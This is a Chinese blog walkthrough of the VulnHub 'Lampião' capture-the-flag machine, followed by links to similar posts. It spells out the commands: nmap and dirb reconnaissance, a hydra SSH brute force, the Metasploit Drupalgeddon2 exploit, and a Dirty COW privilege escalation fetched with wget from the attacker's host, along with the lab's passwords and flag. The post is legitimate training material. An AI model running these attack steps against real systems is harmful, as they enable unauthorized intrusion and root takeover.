vlunhub-Lampiao靶机通关(超详细)

已于 2024-01-03 21:22:39 修改
阅读量778 收藏 13
点赞数 12
分类专栏: vlunhub 文章标签: 网络安全 web安全
于 2024-01-03 21:20:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53730939/article/details/135373104
版权

目录

准备工作

主机发现

全端口扫描

信息枚举

爆破网站目录

获取密码字典

hydra爆破

登录ssh

提权

MSF提权

脏牛提权

登录root-ssh

准备工作

靶机ip:192.168.198.138
kali:192.168.168.128

靶机地址:

Lampião: 1 ~ VulnHub

Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! "Lampião 1".

Get root!

Level: Easy

主机发现

arp-scan 192.168.198.0/24

全端口扫描

nmap -p- 192.168.198.138

目标计算机上有三个可用的开放端口22、80、1898端口

信息枚举

http://192.168.198.138:1898/ -> Read more 发现改页面信息:
http://192.168.198.138:1898/?q=node/2

页面发现:

audio.m4a:语音获得用户名:tiago

qrc.png:图片二维码扫描获得信息,需要爆破

爆破网站目录

dirb http://192.168.198.138:1898

获得url:http://192.168.198.138:1898/robots.txt

继续枚举获得:http://192.168.198.138:1898/CHANGELOG.txt

发现是:Drupal 7.54, 2017-02-01

获取密码字典

先利用cewl来生成一份结合网站目标的社工性质的密码字典

cewl http://192.168.198.138:1898/ -w Lampiao.txt

hydra爆破

使用之前语音获得的用户名:tiago进行ssh爆破

hydra -l tiago -P Lampiao.txt 192.168.198.138 ssh

用户: tiago

密码: Virgulino

登录ssh

ssh tiago@192.168.198.138

发现是低权限用户,需要提权!

提权

MSF提权

msfconsole
search  Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rport 1898
set rhosts 192.168.198.138
exploit
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'

通过漏洞渗透进入系统,但是获得的是低权限用户,和前面ssh登陆的tiago用户权限类似

脏牛提权

下一步要找到反弹shell获取root权限,通过LES(Linux 权限提升审计工具)来检测给定 Linux 内核/基于 Linux 的机器的安全缺陷

下载链接:https://github.com/The-Z-Labs/linux-exploit-suggester 

python -m http.server 8081
tiago@lampiao:~$ wget http://192.168.198.128:8081/les.sh
tiago@lampiao:~$ chmod +x les.sh
tiago@lampiao:~$ ./les.sh

这里我们使用40847提权

1、searchsploit dirty
使用:Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privile | linux/local/40847.cpp
2、cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/

继续开启本地pthon服务,然后把40847.cp发送到靶机上:

3、python -m http.server 8081
4、wget http://192.168.198.128:8081/40847.cpp
5、g++ -Wall -pedantic -O2 -std=c++11 -pthread -o Lampiao 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。
6、./Lampiao

Root password is: dirtyCowFun

获得root用户密码!

登录root-ssh

ssh root@192.168.198.138
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366

此刻已成功拿到flag!!!

Lampiao 靶机练习
SYJ_361的博客
02-28 4886
利用kali对靶机进行扫描,远程登录靶机,并对靶机进行提权,找到靶机里面的文件
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2492
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
[vulnhub系列]lampiao靶机
薛定谔嘚喵博客
03-08 513
1)信息收集:1、nmap挖掘信息。2、挖掘HTTP服务信息。3、搜寻页面有用的信息。4、对信息页面枚举。5、爬取网页信息。2)暴力破解:hydra暴力破解ssh密码3)提权:1、内核提权。
靶机Lampiao
AzVoidSUN的博客
07-06 813
下载地址 https://www.vulnhub.com/entry/lampiao-1,249/ 选择NAT模式或桥接模式都可以 目标 得到root权限 信息收集 kali的ip是192.168.174.129 扫下c段 发现靶机ip 192.168.174.4 开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西 dirb扫下目录 发现扫不到东西 ...
Vulnhub靶机 Lampiao
菜浪马废的博客
04-28 607
找到登录页面 cms:drupal7 可以爆破用户名 先找一下漏洞试试 伐克 尝试了半天 发现版本是7.54 用了半天7.0-7.31的 找到mysql的账号 三个账号 没能解密任何一个 试一下ssh 失败了 root就在你眼前 就是没法提权的感觉 太酸爽了 有一个用户tiago ssh爆破 我*********他 密码是这个?????? 我********* $...
【oscp系列-Lampiaos】靶机2
weixin_44807430的博客
01-16 344
日拱一卒
lampiao靶场
orchid_sea的博客
10-21 830
lampiao靶场
vulnhub-lampiao靶机练习
weixin_52451257的博客
11-10 1810
第一步:信息收集 Nmap –sS –p 1-65535 192.168.231.1-255 (靶机使用的是nat模式,和攻击机处于同一网段,所以扫描231.1-255整个网段的地址排除攻击机kali的ip就可以判断出靶机的ip) 我们可以可能到靶机开放了22(ssh),80(http),1898端口, 可以通过dirmap 扫描目录 Python3 dirmap.py –i http:192.168.231.139 –lcf 先访问80端口看一下网站长啥样,有没有可以利...
渗透测试-Lampiao靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-13 640
1.环境部署 靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip 攻击机:Kali 2019 靶机 : Lampiao 目标:拿下靶机root权限和里面的flag 2.信息搜集 使用arp-scan -l进行局域网主机发现,确定目标靶机IP为192.168.72.132 使用NMAP扫描目标靶机开发的端口 nmap -sS -p 1-65535 192.168.72.132 -n 发现存在一个ssh服务,和2个web服务 对两个web服务进
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 3136
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
靶机渗透】LAMPIAO靶机渗透练习
serendipity1130的博客
08-30 759
LAMPIAO训练靶机 1.arp-scan -l扫描到IP地址为:192.168.225.140 使用nmap扫描到开启了22和80端口以及1898端口: nmap 192.168.225.140 -sV -sC -Pn -n -v -T5 -p- 2.访问1898端口,发现网页下面的标志:Powered by Drupal 1)进行dirsearch扫描,在目录中发现了robots.txt文件 查看该文件,查看CHANGELOG.txt文件,发现网站的版本信息7.54,看到cms的版
Lampiao靶机通关
最新发布
weixin_45139674的博客
10-15 1532
cp /usr/share/exploitdb/exploits/linux_x86-64/local/40871.c /home/kali/桌面。cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/桌面/靶机安装地址:https://www.vulnhub.com/entry/lampiao-1,249/ 选择。这里很显然出现了不同的目录下会有不同的内容,是否有其他的目录我们这里无法直接去猜测的,这时候就需要利用工具了。
lampiao靶场---脏牛提权
m0_66908617的博客
05-11 568
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现。
vlunhub- BoredHackerBlog Social Network
GALi_233的博客
08-21 938
Description Leave a message is a new anonymous social networking site where users can post messages for each other. They’ve assigned you to test their set up. They do utilize docker containers. You can conduct attacks against those too. Try to see if you
Lampião靶机渗透
weixin_56306210的博客
07-24 289
Lampião靶机渗透
vulnhub靶机-Lampiao
臭nana的博客
12-18 455
搭好环境之后,找到靶机的ip,我这里是10.22.102.174,nmap扫描端口,nmap -p- 10.22.102.174 发现80端口,访问一下 再访问一下1898端口,利用谷歌插件wappalyzer发现这个网站是Drupal7 cms 直接上网百度相关漏洞,发现一大堆,其中发现一个CVE-2018-7600 进入kali,打开终端,输入msfconsole,进...
简单靶机 Lampiao 笔记
2301_79118231的博客
09-19 386
准备:kali 、 Lampiao靶机kali 靶机设置为同一网段。
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
rang的博客
08-19 2901
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值